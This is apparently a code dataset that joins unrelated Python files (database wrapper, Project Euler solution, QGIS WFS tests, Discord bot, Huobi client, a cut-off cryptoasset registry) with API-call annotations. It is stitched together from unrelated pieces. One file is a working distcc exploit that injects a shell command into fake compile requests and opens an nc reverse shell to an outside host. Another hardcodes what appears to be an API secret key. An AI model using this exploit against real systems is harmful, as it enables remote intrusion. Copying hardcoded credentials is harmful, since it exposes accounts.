''' MIT License Copyright (c) 2019 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' import sqlite3 class Database: def __init__(self, name): self.connection = sqlite3.connect(name) self.cursor = self.connection.cursor() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.commit() self.connection.close() def commit(self): self.connection.commit() def execute(self, sql, params=None): self.cursor.execute(sql, params or ()) def fetchall(self): return self.cursor.fetchall() def fetfchone(self): return self.cursor.fetchone() def query(self, sql, params=None): self.cursor.execute(sql, params or ()) return self.fetchall()
[ "sqlite3.connect" ]
[((1160, 1181), 'sqlite3.connect', 'sqlite3.connect', (['name'], {}), '(name)\n', (1175, 1181), False, 'import sqlite3\n')]
''' Problem 28 11 October 2002 Starting with the number 1 and moving to the right in a clockwise direction a 5 by 5 spiral is formed as follows: 21 22 23 24 25 20 7 8 9 10 19 6 1 2 11 18 5 4 3 12 17 16 15 14 13 It can be verified that the sum of the numbers on the diagonals is 101. What is the sum of the numbers on the diagonals in a 1001 by 1001 spiral formed in the same way? ---------------------------------------------------------- Created on 12.04.2012 @author: ahallmann ''' import unittest import timeit def print_table(table): s = "" for row in table: for column in row: s += str(column) + " " s += "\n" print(s) def spiral(size, clockwise=True): table = [[0 for i in range(size)] for j in range(size)] i = 1 x = (size/2) y = (size/2) if size % 2 == 0: x -= 1 w = 1 direction = 0 table[y][x] = i for m in range(1, size*size): if m != 1 and m % 2 == 1: w += 1 for step in range(1, w+1): if direction == 0: x += 1 if direction == 1: if clockwise: y += 1 else: y -= 1 if direction == 2: x -= 1 if direction == 3: if clockwise: y -= 1 else: y += 1 # check if index out of bounds if x < 0 or x >= size or y < 0 or y >= size: return table i += 1 table[y][x] = i direction = (direction + 1) % 4 return table def diagonals(table, size): lst = [] # size = len(table) for i in range(size): lst.append(table[i][i]) if i != size / 2: lst.append(table[i][size-i-1]) return lst def count_diagonal(table, size): return sum(diagonals(table, size)) def solve(size=1001): table = spiral(size) return count_diagonal(table, size) class Test(unittest.TestCase): def test_sample(self): self.assertEquals(101, solve(5)) pass def test_answer(self): self.assertEquals(669171001, solve(1001)) pass # ----------------------------------------- def run(): return solve() if __name__ == '__main__': unittest.main() #if __name__ == '__main__': # t = timeit.Timer("run()", "from __main__ import run") # count = 100 # print(str(t.timeit(count)) + " seconds for " + str(count) + " runs")
[ "unittest.main" ]
[((2490, 2505), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2503, 2505), False, 'import unittest\n')]
# -*- coding: utf-8 -*- """QGIS Unit tests for QgsServer. .. note:: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. """ __author__ = '<NAME>' __date__ = '28/08/2015' __copyright__ = 'Copyright 2015, The QGIS Project' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183' print('CTEST_FULL_OUTPUT') from qgis.testing import unittest import urllib.request import urllib.parse import urllib.error from test_qgsserver_accesscontrol import TestQgsServerAccessControl, XML_NS class TestQgsServerAccessControlWFS(TestQgsServerAccessControl): def test_wfs_getcapabilities(self): query_string = "&".join(["%s=%s" % i for i in list({ "MAP": urllib.parse.quote(self.projectPath), "SERVICE": "WFS", "VERSION": "1.0.0", "REQUEST": "GetCapabilities" }.items())]) response, headers = self._get_fullaccess(query_string) self.assertTrue( str(response).find("<Name>Hello</Name>") != -1, "No Hello layer in WFS/GetCapabilities\n%s" % response) self.assertTrue( str(response).find("<Name>Hello_OnOff</Name>") != -1, "No Hello layer in WFS/GetCapabilities\n%s" % response) self.assertTrue( str(response).find("<Name>Country</Name>") != -1, "No Country layer in WFS/GetCapabilities\n%s" % response) response, headers = self._get_restricted(query_string) self.assertTrue( str(response).find("<Name>Hello</Name>") != -1, "No Hello layer in WFS/GetCapabilities\n%s" % response) self.assertFalse( str(response).find("<Name>Country</Name>") != -1, "Unexpected Country layer in WFS/GetCapabilities\n%s" % response) def test_wfs_describefeaturetype_hello(self): query_string = "&".join(["%s=%s" % i for i in list({ "MAP": urllib.parse.quote(self.projectPath), "SERVICE": "WFS", "VERSION": "1.0.0", "REQUEST": "DescribeFeatureType", "TYPENAME": "Hello" }.items())]) response, headers = self._get_fullaccess(query_string) self.assertTrue( str(response).find('name="Hello"') != -1, "No Hello layer in DescribeFeatureType\n%s" % response) response, headers = self._get_restricted(query_string) self.assertTrue( str(response).find('name="Hello"') != -1, "No Hello layer in DescribeFeatureType\n%s" % response) def test_wfs_describefeaturetype_country(self): query_string = "&".join(["%s=%s" % i for i in list({ "MAP": urllib.parse.quote(self.projectPath), "SERVICE": "WFS", "VERSION": "1.0.0", "REQUEST": "DescribeFeatureType", "TYPENAME": "Country" }.items())]) response, headers = self._get_fullaccess(query_string) self.assertTrue( str(response).find('name="Country"') != -1, "No Country layer in DescribeFeatureType\n%s" % response) response, headers = self._get_restricted(query_string) self.assertFalse( str(response).find('name="Country"') != -1, "Unexpected Country layer in DescribeFeatureType\n%s" % response) def test_wfs_getfeature_hello(self): data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>1</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>1</qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertTrue( str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok "No color in result of GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertTrue( str(response).find("<qgs:pk>1</qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertFalse( str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok "Unexpected color in result of GetFeature\n%s" % response) self.assertFalse( str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok "Unexpected color NULL in result of GetFeature\n%s" % response) def test_wfs_getfeature_hello2(self): data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>2</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>2</qgs:pk>") != -1, "No result in GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertFalse( str(response).find("<qgs:pk>2</qgs:pk>") != -1, "Unexpected result in GetFeature\n%s" % response) def test_wfs_getfeature_country(self): data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello_OnOff" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>1</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>1</qgs:pk>") != -1, "No result in GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertFalse( str(response).find("<qgs:pk>1</qgs:pk>") != -1, "Unexpected result in GetFeature\n%s" % response) # spellok # # Subset String # # def test_wfs_getfeature_subsetstring(self): data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>1</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertTrue( str(response).find("<qgs:pk>1</qgs:pk>") != -1, "No good result in GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertTrue( str(response).find("<qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertTrue( str(response).find("<qgs:pk>1</qgs:pk>") != -1, "No good result in GetFeature\n%s" % response) def test_wfs_getfeature_subsetstring2(self): data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>2</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertTrue( str(response).find("<qgs:pk>2</qgs:pk>") != -1, "No good result in GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertFalse( str(response).find("<qgs:pk>") != -1, "Unexpected result in GetFeature\n%s" % response) def test_wfs_getfeature_project_subsetstring(self): """Tests access control with a subset string already applied to a layer in a project 'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)" This test checks for retrieving a feature which should be available in with/without access control """ data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>7</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) # should be one result response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertTrue( str(response).find("<qgs:pk>7</qgs:pk>") != -1, "Feature with pkuid=7 not found in GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertTrue( str(response).find("<qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertTrue( str(response).find("<qgs:pk>7</qgs:pk>") != -1, "Feature with pkuid=7 not found in GetFeature, has been incorrectly filtered out by access controls\n%s" % response) def test_wfs_getfeature_project_subsetstring2(self): """Tests access control with a subset string already applied to a layer in a project 'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)" This test checks for a feature which should be filtered out by access controls """ data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>8</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) # should be one result response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>") != -1, "No result in GetFeature\n%s" % response) self.assertTrue( str(response).find("<qgs:pk>8</qgs:pk>") != -1, "Feature with pkuid=8 not found in GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertFalse( str(response).find("<qgs:pk>") != -1, "Feature with pkuid=8 was found in GetFeature, but should have been filtered out by access controls\n%s" % response) def test_wfs_getfeature_project_subsetstring3(self): """Tests access control with a subset string already applied to a layer in a project 'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)" This test checks for a features which should be filtered out by project subsetStrings. For example, pkuid 6 passes the access control checks, but should not be shown because of project layer subsetString """ data = """<?xml version="1.0" encoding="UTF-8"?> <wfs:GetFeature {xml_ns}> <wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml"> <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo> <ogc:PropertyName>pkuid</ogc:PropertyName> <ogc:Literal>6</ogc:Literal> </ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS) # should be no results, since pkuid 1 should be filtered out by project subsetString response, headers = self._post_fullaccess(data) self.assertTrue( str(response).find("<qgs:pk>") == -1, "Project based layer subsetString not respected in GetFeature\n%s" % response) response, headers = self._post_restricted(data) self.assertFalse( str(response).find("<qgs:pk>") != -1, "Project based layer subsetString not respected in GetFeature with restricted access\n%s" % response) if __name__ == "__main__": unittest.main()
[ "qgis.testing.unittest.main" ]
[((13834, 13849), 'qgis.testing.unittest.main', 'unittest.main', ([], {}), '()\n', (13847, 13849), False, 'from qgis.testing import unittest\n')]
import asyncio import os import pathlib import time from datetime import datetime as dt import discord import lavalink import pymongo as pym from discord.ext.commands import * from jishaku.help_command import * import config intents = discord.Intents.all() print(intents) class DataLogger: def __init__(self, permafile): self.permafile = permafile self.tempdata = {} self.mongo = pym.MongoClient() self.db = self.mongo["BotLogger"] self.col = self.db["logs"] # self.tempdata=self.db["random"].find_one({}) print(self.tempdata) def write(self, author, action, victim, reason, duration="Infinite", backup=None): with open("num.txt") as f: num = int(f.read()) with open("num.txt", "w") as f: f.write(str(num + 1)) doc = { "author": author.id, "action": action, "victim": victim.id, "reason": reason, "stamp": dt.now().strftime("%y/%m/%d:%I:%M:%S"), "case": num + 1, "duration": duration, } if not (backup == None): doc["backup"] = backup self.col.insert_one(doc) def read_all(self): a = [] for i in self.col.find(): a.append(i) return a def read_warns(self): a = self.read_all() b = [] for i in a: if i["action"] == "WARN": b.append(i) return b def read_case(self, num): return self.col.find_one({"case": num}) def update(self): pass class RR: def __init__(self, permafile): self.permafile = permafile with open(permafile) as f: pass class DarkBot(Bot): def __init__(self, *args, prefix=None, **kwargs): super().__init__(prefix, *args, **kwargs) self.bad_words = [ "fuck", "shit", "ass", "whore", "bitch", "dick", "pussy", "tit", "shrey", "tbag", "retard", ] self.bad_words = [] self.bg_task = self.loop.create_task(self.playingstatus()) self.mute_task = self.loop.create_task(self.mutecheck()) self.update_task = self.loop.create_task(self.updatelogger()) self.logger = DataLogger("logs.txt") self.logger.tempdata["mutes"] = {} self.games = ["with your life", "VALORANT as Yo Mamma"] self.musicbackend = None async def on_ready(self): status = "Planet 666 | discord.gg/8GMA2M3 | 6!help" self.invite = discord.utils.oauth_url( self.user.id, discord.Permissions(permissions=8) ) print( "Logged in as", client.user.name, "\nId:", client.user.id, "\nOath:", self.invite, ) print("--------") await self.change_presence( activity=discord.Game(name=status), status=discord.Status.online ) async def on_message(self, msg: discord.Message): ctx = await self.get_context(msg) if ( msg.author.id == 544699702558588930 and msg.content == "thou shalt be cast in flame" ): exit() for i in self.bad_words: if i in "".join(msg.content.split()).lower() and ctx.author.bot == False: await msg.delete() await ctx.send("stop swearing") if ctx.message.author.id in self.logger.tempdata["mutes"]: await msg.delete() with open("blist.txt") as f: a = f.readlines() if msg.content.startswith("6!"): # await ctx.send("HA!") print(a) print(ctx.author.id) if str(ctx.author.id) + "\n" in a: await ctx.send("Blacklisted") return if msg.content.startswith("6!rr"): return try: await self.process_commands(msg) except Exception as ex: print(ex) async def logout(self): if (musiccog := self.get_cog("Music")) is not None: await musiccog.logout() await super().logout() async def on_command_error(self, ctx, error): await ctx.send(error) async def process_commands(self, message): await super().process_commands(message) async def playingstatus(self): await self.wait_until_ready() while self.is_ready(): status = "Planet 666 | discord.gg/8GMA2M3 | 6!help" await self.change_presence( activity=discord.Game(name=status), status=discord.Status.online ) await asyncio.sleep(120) async def mutecheck(self): await self.wait_until_ready() while self.is_ready(): for key in self.logger.tempdata["mutes"]: value = self.logger.tempdata["mutes"][key] print(key, value) if value[0] <= time.time(): del self.logger.tempdata["mutes"][key] await asyncio.sleep(10) async def updatelogger(self): await self.wait_until_ready() while self.is_ready(): self.logger.update() await asyncio.sleep(10) @property def connection(self): return self._connection if __name__ == "__main__": client = DarkBot( intents=intents, prefix=when_mentioned_or("6!"), help_command=commands.MinimalHelpCommand(), ) nocogs = ["secret"] for file in os.listdir("cogs"): if file.endswith(".py") and not (file[:-3] in nocogs): name = file[:-3] try: client.load_extension(f"cogs.{name}") print(f"Loaded cog {name}") except Exception as e: print(f"Failed to load cog {name} due to error\n", e) client.load_extension("jishaku") try: client.run(config.token) except: print("Bye!") raise # exit()
[ "os.listdir", "discord.Game", "discord.Permissions", "discord.Intents.all", "datetime.datetime.now", "asyncio.sleep", "pymongo.MongoClient", "time.time" ]
[((238, 259), 'discord.Intents.all', 'discord.Intents.all', ([], {}), '()\n', (257, 259), False, 'import discord\n'), ((5633, 5651), 'os.listdir', 'os.listdir', (['"""cogs"""'], {}), "('cogs')\n", (5643, 5651), False, 'import os\n'), ((413, 430), 'pymongo.MongoClient', 'pym.MongoClient', ([], {}), '()\n', (428, 430), True, 'import pymongo as pym\n'), ((2701, 2735), 'discord.Permissions', 'discord.Permissions', ([], {'permissions': '(8)'}), '(permissions=8)\n', (2720, 2735), False, 'import discord\n'), ((4767, 4785), 'asyncio.sleep', 'asyncio.sleep', (['(120)'], {}), '(120)\n', (4780, 4785), False, 'import asyncio\n'), ((5155, 5172), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (5168, 5172), False, 'import asyncio\n'), ((5328, 5345), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (5341, 5345), False, 'import asyncio\n'), ((984, 992), 'datetime.datetime.now', 'dt.now', ([], {}), '()\n', (990, 992), True, 'from datetime import datetime as dt\n'), ((3009, 3034), 'discord.Game', 'discord.Game', ([], {'name': 'status'}), '(name=status)\n', (3021, 3034), False, 'import discord\n'), ((5065, 5076), 'time.time', 'time.time', ([], {}), '()\n', (5074, 5076), False, 'import time\n'), ((4679, 4704), 'discord.Game', 'discord.Game', ([], {'name': 'status'}), '(name=status)\n', (4691, 4704), False, 'import discord\n')]
from unittest.mock import Mock, patch from core import ExactDelayPathfinder import unittest import networkx as nx class TestEDPF(unittest.TestCase): @patch('exactdelaypathfinder.core.ExactDelayPathfinder', autospec=True) def test_search(self, mock_EDPF): """ Tests the search function Parameters: mock_EDPF: Mock object reference of ExactDelayPathfinder """ new_mock_EDPF = mock_EDPF.return_value new_mock_EDPF.search.return_value = 42 G = Mock() new_mock_EDPF.search(G, 10, 'a', 'b') new_mock_EDPF.search.assert_called() @patch.object(ExactDelayPathfinder, '_search') def test_search(self, mock_search): """ Tests the _search function, the DFS algorithm (recursive method) Parameters: mock_EDPF: Mock object reference of ExactDelayPathfinder """ new_EDPF = ExactDelayPathfinder() mock_search.return_value = [] G = Mock() G.nodes = [] delay = 64; start = 'a' end = 'b' new_EDPF.search(G, 64, 'a', 'b') new_EDPF._search.assert_called() def test_search_graph_Error(self): """ Tests the search function attribute errors for the graph input parameter """ EDPF = ExactDelayPathfinder() G = None self.assertRaises(AttributeError, EDPF.search, G, 10,'a', 'b') def test_search_delay_Error(self): """ Tests the search function attribute errors for the delay input parameter """ EDPF = ExactDelayPathfinder() G = Mock() self.assertRaises(AttributeError, EDPF.search, G, -10,'a', 'b') def test_search_max_result_Error(self): """ Tests the search function attribute errors for the max result parameter """ EDPF = ExactDelayPathfinder() G = Mock() self.assertRaises(AttributeError, EDPF.search, G, -10,'a', 'b', -5)
[ "unittest.mock.Mock", "core.ExactDelayPathfinder", "unittest.mock.patch", "unittest.mock.patch.object" ]
[((156, 226), 'unittest.mock.patch', 'patch', (['"""exactdelaypathfinder.core.ExactDelayPathfinder"""'], {'autospec': '(True)'}), "('exactdelaypathfinder.core.ExactDelayPathfinder', autospec=True)\n", (161, 226), False, 'from unittest.mock import Mock, patch\n'), ((639, 684), 'unittest.mock.patch.object', 'patch.object', (['ExactDelayPathfinder', '"""_search"""'], {}), "(ExactDelayPathfinder, '_search')\n", (651, 684), False, 'from unittest.mock import Mock, patch\n'), ((527, 533), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (531, 533), False, 'from unittest.mock import Mock, patch\n'), ((939, 961), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (959, 961), False, 'from core import ExactDelayPathfinder\n'), ((1013, 1019), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1017, 1019), False, 'from unittest.mock import Mock, patch\n'), ((1325, 1347), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1345, 1347), False, 'from core import ExactDelayPathfinder\n'), ((1593, 1615), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1613, 1615), False, 'from core import ExactDelayPathfinder\n'), ((1628, 1634), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1632, 1634), False, 'from unittest.mock import Mock, patch\n'), ((1859, 1881), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1879, 1881), False, 'from core import ExactDelayPathfinder\n'), ((1894, 1900), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1898, 1900), False, 'from unittest.mock import Mock, patch\n')]
from __future__ import print_function import re import sys def widthFind(val, widths): for name in widths: if widths[name] == val: return name print("Could not find a type: " + val) sys.exit(-1) def readNoComments(f): file = '' comment = False for line in f: if comment: pos = line.find('*/') if pos < 0: continue else: line = line[pos+2:] comment = False pos = line.find('/*') if pos >= 0: line = line[0:pos] comment = True pos = line.find('//') if pos >= 0: line = line[0:pos] line = line.strip() if len(line): file += line + " " return file def readModules(file, module_name, widths): parts = file.split("module "+module_name+"_")[1:] modules = {} for module in parts: end = module.find('endmodule') if end < 0: raise Exception('endmodule not found') module = module[:end] name = re.match('[A-Za-z0-9_]+',module).group(0) print('Found a module: "'+name+'"') posopen = module.find('(') posclose = module.find(')',posopen) minouts = [] statements = module[posclose+1:].split(';') for inout in module[posopen+1:posclose].split(','): inout = inout.strip() p = inout.rsplit(' ', 1) if len(p) == 1: minouts.append(p[0]) else: minouts.append(p[1]) statements.append(inout) minputs = [] moutputs = [] for line in statements: line = line.strip() if line.startswith('input') or line.startswith('output'): pos = line.find(' ') line2 = line[pos+1:].strip() pos = line2.rfind(' ') if pos < 0: typename = 'bit' ioname = line2.strip() else: type = line2[:pos].strip() ioname = line2[pos:].strip() typename = widthFind(type, widths) if ioname.startswith('__'): continue if line.startswith('input'): minputs.append( (typename, ioname)) #print(' input',ioname) else: moutputs.append( (typename, ioname)) #print(' output',ioname) if ioname not in minouts: print("------------------------------------------") print("Warning:", ioname, "is missing in I/O list.") print("------------------------------------------") modules[name] = { 'name':name, 'inputs':minputs, 'outputs':moutputs, } return modules
[ "re.match", "sys.exit" ]
[((191, 203), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (199, 203), False, 'import sys\n'), ((861, 894), 're.match', 're.match', (['"""[A-Za-z0-9_]+"""', 'module'], {}), "('[A-Za-z0-9_]+', module)\n", (869, 894), False, 'import re\n')]
#!/usr/bin/env python # -*- coding: utf-8 -*- ############################################## # # This is open source software licensed under the Apache License 2.0 # http://www.apache.org/licenses/LICENSE-2.0 # ############################################## """Setup for plantgateway.""" from setuptools import setup from plantgw import __version__ INSTALL_REQUIRES = ['bluepy==1.1.4', "paho-mqtt", 'pyyaml', "miflora==0.4"] setup( name='plantgateway', version=__version__, description='Bluetooth to mqtt gateway for Xiaomi Mi plant sensors', author='<NAME>', author_email='<EMAIL>', url='https://www.python.org/sigs/distutils-sig/', packages=['plantgw'], install_requires=INSTALL_REQUIRES, scripts=['plantgateway'], )
[ "setuptools.setup" ]
[((428, 737), 'setuptools.setup', 'setup', ([], {'name': '"""plantgateway"""', 'version': '__version__', 'description': '"""Bluetooth to mqtt gateway for Xiaomi Mi plant sensors"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://www.python.org/sigs/distutils-sig/"""', 'packages': "['plantgw']", 'install_requires': 'INSTALL_REQUIRES', 'scripts': "['plantgateway']"}), "(name='plantgateway', version=__version__, description=\n 'Bluetooth to mqtt gateway for Xiaomi Mi plant sensors', author=\n '<NAME>', author_email='<EMAIL>', url=\n 'https://www.python.org/sigs/distutils-sig/', packages=['plantgw'],\n install_requires=INSTALL_REQUIRES, scripts=['plantgateway'])\n", (433, 737), False, 'from setuptools import setup\n')]
from huobi import HuobiRestClient client = HuobiRestClient(access_key='<KEY>', secret_key='ff053cec-06dec3aa-3a15eecf-39e65') trades = client.market_history_trade(symbol='ethusdt').data trades print(trades) #help(HuobiRestClient) kline = client.market_history_kline(symbol='btcusdt').data kline = client.market_history_kline(symbol='btcusdt').data kline = client.market_history_kline(symbol='btcusdt').data print(kline) #help(HuobiRestClient)
[ "huobi.HuobiRestClient" ]
[((43, 130), 'huobi.HuobiRestClient', 'HuobiRestClient', ([], {'access_key': '"""<KEY>"""', 'secret_key': '"""ff053cec-06dec3aa-3a15eecf-39e65"""'}), "(access_key='<KEY>', secret_key=\n 'ff053cec-06dec3aa-3a15eecf-39e65')\n", (58, 130), False, 'from huobi import HuobiRestClient\n')]
#!/usr/bin/python3 # Ported from Metasploit module - https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec import socket from sys import argv import random import string if len(argv) != 3: print('Usage: ./distcc_exploit ip_addr port') exit(1) def exploit(ip, port): # replace payload payload = "nc 1.1.1.1 4444 -e /bin/bash" try: print('[*] Attempting exploit...') distcc_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) distcc_socket.connect((ip, int(port))) distcmd = generate_cmd("sh", "-c", payload) # encode() to bytes distcc_socket.send(distcmd.encode()) dtag = random_string_digits(10) msg = ('DOTI0000000A' + dtag + '\n') distcc_socket.send(msg.encode()) print("Check your reverse handler...") response = distcc_socket.recv(1024).decode('utf-8') print('[+] Response:\n', response) except socket.error: print('[!] Failed to exploit %s' % ip) # generate fake request def generate_cmd(*args): cmd = list(args) + ['#', '-c', 'main.c', '-o', 'main.o'] # make it look like a compilation request request = 'DIST00000001' + 'ARGC' + str(len(cmd)).zfill(8) for c in cmd: # returns len(c) and pad it with zeroes such that there are 8 digits after ARGV request += 'ARGV' + "{0:0{1}x}".format(len(c), 8) + c return request # generate a random string of letters and digits def random_string_digits(string_length): # creates string with a set of all letters and digits letters_digits = string.ascii_letters + string.digits # creates a random string of string_length random_string = '' for i in range(string_length): random_string = random_string + random.choice(letters_digits) return random_string exploit(argv[1], argv[2])
[ "random.choice", "socket.socket" ]
[((433, 482), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (446, 482), False, 'import socket\n'), ((1774, 1803), 'random.choice', 'random.choice', (['letters_digits'], {}), '(letters_digits)\n', (1787, 1803), False, 'import random\n')]
"""All running cryptoassets are maintained in a coin registry. Each cryptoasset provides its own Wallet SQLAlchemy model and backend instance which is used to communicate with the network of the cryptoasset. """ from zope.dottedname.resolve import resolve class CoinModelDescription: """Describe one cryptocurrency data structures: what SQLAlchemy models and database tables it uses. The instance of this class is used by :py:class:`cryptoassets.core.models.CoinDescriptionModel` to build the model relatinoships and foreign keys between the tables of one cryptoasset. """ def __init__(self, coin_name, wallet_model_name, address_model_name, account_model_name, transaction_model_name, network_transaction_model_name, address_validator): """Create the description with fully dotted paths to Python classes. :param coin_name: Name of this coin, lowercase acronym """ assert coin_name == coin_name.lower() self.coin_name = coin_name self.wallet_model_name = wallet_model_name self.address_model_name = address_model_name self.account_model_name = account_model_name self.transaction_model_name = transaction_model_name self.network_transaction_model_name = network_transaction_model_name self.address_validator = address_validator # Direct model class reference. Available after Python modules are loaded and Cryptoassets App session initialized self._Wallet = None self._Address = None self._Account = None self._NetworkTransaction = None self._Transaction = None @property def Wallet(self): """Get wallet model class.""" return self._lazy_initialize_class_ref("_Wallet", self.wallet_model_name) @property def Address(self): """Get address model class.""" return self._lazy_initialize_class_ref("_Address", self.address_model_name) @property def Account(self): """Get account model class.""" return self._lazy_initialize_class_ref("_Account", self.account_model_name) @property def NetworkTransaction(self): """Get network transaction model class.""" return self._lazy_initialize_class_ref("_NetworkTransaction", self.network_transaction_model_name) @property def Transaction(self): """Get transaction model class.""" return self._lazy_initialize_class_ref("_Transaction", self.transaction_model_name) @property def wallet_table_name(self): 